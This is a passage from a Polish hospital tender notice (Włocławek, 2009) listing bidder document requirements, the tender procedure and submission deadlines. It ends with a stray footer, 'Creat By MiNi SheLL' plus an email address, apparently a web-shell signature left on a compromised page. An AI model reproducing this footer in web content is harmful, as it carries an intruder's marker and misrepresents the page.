c. aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert,
d. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt   4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e. aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

3. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 2 Zamawiający  żąda złożenia następujących dokumentów
a. wykaz  wykonania z należytą starannością w okresie ostatnich 3 lat ( jeśli okres prowadzenia  działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania - co  najmniej 3 usług o charakterze i złożoności porównywalnej z przedmiotem zamówienia  wykonane  na kwotę  500 000,00 zł brutto ( każda usługa ) wraz z  załączeniem dokumentów potwierdzających należyte ich wykonanie lub wykonywanie, wg. Załącznika nr 6  do SIWZ

4. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 3 Zamawiający   żąda złożenia następujących dokumentów
a. polisy lub innego dokumentu  ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie wykonywanej działalności gospodarczej, z dowodem  zapłaty składki z tytułu zawarcia umowy ubezpieczenia. Wysokość ubezpieczenia  z tytułu winna  wynosić  łącznie minimum 500 000,00 zł.
Wszystkie wymagane dokumenty muszą być złożone w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.
Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  TAJNE . W tym celu należy również wypełnić Załącznik nr 7 do niniejszej specyfikacji.
Uwaga  brak któregokolwiek z dokumentów określonych w Rozdziale V i VI spowoduje odrzucenie  oferty na podstawie art. 89 ust.1 pkt 2  ustawy Prawo zamówień  publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki
ul. Wieniecka 49 p. 303
87 - 800 Włocławek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2009 godzina 10:00, miejsce: Szpital Wojewódzki
ul. Wieniecka 49 p. 303
87 - 800 Włocławek.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com